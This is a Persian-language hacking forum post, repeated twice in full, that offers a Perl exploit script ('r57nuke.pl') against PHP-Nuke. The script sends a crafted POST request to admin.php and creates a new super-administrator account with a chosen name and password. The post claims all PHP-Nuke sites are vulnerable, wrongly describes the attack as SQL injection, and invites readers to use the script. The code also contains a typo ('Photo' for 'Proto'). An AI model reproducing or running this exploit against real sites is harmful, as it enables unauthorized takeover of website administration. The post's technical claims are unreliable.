دوستان عزيز سلام
همه سايتهاي نوشته شده با ن.ك به اين اكسپلويت جواب ميدن 8O فكر كنم با اين حساب اين سيستم به درد خاله فرانسيسكو بارزي بخوره
يك فايل پرل ميتونه پسورد ادمين رو بيرون بكشه ... خيلي راحت..........
اين نوع هك با استفاده ار SQL Injection انجام ميشه
اين هم فايل پرلش اگه ميتونيد روش كار كنيد اينم ضعف سيستم نوك
#!/usr/bin/perl
# * r57nuke.pl *
# * php-nuke all versions and spaiz-nuke version < 1.2beta xploit *
use IO::Socket;
print "Enter host (e.g. www.phpnuke.com): \r\n";
chomp($server=<STDIN>);
# get new admin nick =)
print "Enter u nick (e.g. hacker): \r\n";
chomp($nick=<STDIN>);
# get new admin pass =)
print "Enter u pass (e.g. password): \r\n";
chomp($pass=<STDIN>);
# get admin hash =)
print "Enter hash (e.g. YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6): \r\n";
chomp($hash=<STDIN>);
$port="80";
$path="/admin.php?op=AddAuthor&add_radminsuper=1&add_name=$nick&add_aid=$nick&[email protected]&add_pwd=$pass&admin=$hash";
print "\r\nConnecting... ";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Photo => tcp)
or die;
print "OK \r\n";
print "exploiting... ";
# send string to server
print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Referer: $server/admin.php\n";
print $socket "User-Agent: r57spaiz\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";
print "OK \r\n";
print "now u can go to $server/admin.php and just use login $nick and password $pass for access \r\n";
همه سايتهاي نوشته شده با ن.ك به اين اكسپلويت جواب ميدن 8O فكر كنم با اين حساب اين سيستم به درد خاله فرانسيسكو بارزي بخوره
يك فايل پرل ميتونه پسورد ادمين رو بيرون بكشه ... خيلي راحت..........
اين نوع هك با استفاده ار SQL Injection انجام ميشه
اين هم فايل پرلش اگه ميتونيد روش كار كنيد اينم ضعف سيستم نوك
#!/usr/bin/perl
# * r57nuke.pl *
# * php-nuke all versions and spaiz-nuke version < 1.2beta xploit *
use IO::Socket;
print "Enter host (e.g. www.phpnuke.com): \r\n";
chomp($server=<STDIN>);
# get new admin nick =)
print "Enter u nick (e.g. hacker): \r\n";
chomp($nick=<STDIN>);
# get new admin pass =)
print "Enter u pass (e.g. password): \r\n";
chomp($pass=<STDIN>);
# get admin hash =)
print "Enter hash (e.g. YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6): \r\n";
chomp($hash=<STDIN>);
$port="80";
$path="/admin.php?op=AddAuthor&add_radminsuper=1&add_name=$nick&add_aid=$nick&[email protected]&add_pwd=$pass&admin=$hash";
print "\r\nConnecting... ";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Photo => tcp)
or die;
print "OK \r\n";
print "exploiting... ";
# send string to server
print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Referer: $server/admin.php\n";
print $socket "User-Agent: r57spaiz\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";
print "OK \r\n";
print "now u can go to $server/admin.php and just use login $nick and password $pass for access \r\n";